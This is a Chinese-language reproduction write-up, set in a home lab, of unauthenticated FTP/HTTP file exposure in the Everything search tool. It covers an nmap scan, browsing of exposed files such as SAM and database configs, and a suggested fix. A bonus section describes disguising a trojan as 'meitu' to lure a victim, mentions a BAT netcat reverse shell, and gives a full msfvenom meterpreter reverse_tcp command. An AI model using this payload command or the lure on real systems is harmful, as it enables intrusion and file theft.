Everything漏洞复现

0x00 简介

Everything是Windows上一款搜索引擎，它能够基于文件名快速定文件和文件夹位置。不像window内置搜索，Everything默认显示电脑上每个文件和文件夹。

0x01 漏洞描述

由于配置中开启了ETP/FTP和HTTP服务，并未设置账号密码，导致可以访问服务器的文件。

0x02 受影响范围

Everything软件开启了ETP/FTP或HTTP服务且未设置账号密码的。

0x03 复现环境

官网下载软件：https://www.voidtools.com/zh-cn/downloads/

选择要安装的语言—这里就默认简体中文

点击我接受

选择要安装的目录

安装的选项，保持默认即可


安装完成后打开选项设置



这样我们在Vmware的win7上开启了相关的配置

0x04 漏洞利用

Win7机器的IP地址为192.168.10.128，在本地机器上使用nmap扫描下相关的端口服务。
Nmap -sS -Pn -P- -A -O 192.168.10.128

这里主看21端口和80端口的描述，识别为Everything相关的服务。猜测是开启了ETP/FTP和HTTP的配置。
我们在本地机器上使用Everything软件的连接ETP服务器


成功登录上了win7机器或者游览器直接打开：ftp://192.168.10.128/

HTTP服务敏感信息泄露
游览器直接输入：192.168.10.128

0x05 修复方式

只有正确的输入账号密码之后才能登陆成功。

0x06 总结

由于配置不得当可以造成敏感信息泄露，不法利用者可以利用此漏洞进行盗取用户的敏感文件，如中间件的配置，Web网站与数据库的连接配置，SAM文件、my.ini文件、、、等一些列文件。此类漏洞大多都是由于配置不当造成，故应加强配置操作的细心。

番外

Everything配置不当造成敏感信息泄露的同时，亦可以拿来用作attack操作。
实验准备：
kali：192.168.10.129 (用来监听反弹)
Win7：192.168.10.128 （被攻击者）
Win10: 12.16.41.150 （攻击方）
思路如下：
Win 10（本地机器）开启Everything的HTTP服务，在本地上次木马文件，诱导Win7（受害者）下载运行，kali（监听反弹的机器）。

这里win7和kali都是运行在Vmware中。与真实网络环境相差并不大。

一：BAT文件反弹NC

我在本地Win10上创建了meitu.bat文件，内容如下图




可以执行一些列操作。
当然用户也不会这么傻，cmd端口一旦关闭命令会话就会结束。可以采用静默运行bat文件的方式来反弹一个会话信息，这里由于我没找到相关的静默运行方法不在演示（有静默运行bat文件的思路）

二:msfvenom生成木马exe文件

kali中执行：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.129 LPORT=1234 -f exe -o /root/meitu.exe

总结

一起漏洞引发的反问？是漏洞还是攻击工具？这取决于用户的自身，因使用者身份的不同带来的影响也是不一样的。只要思路宽，鱼和熊掌兼得。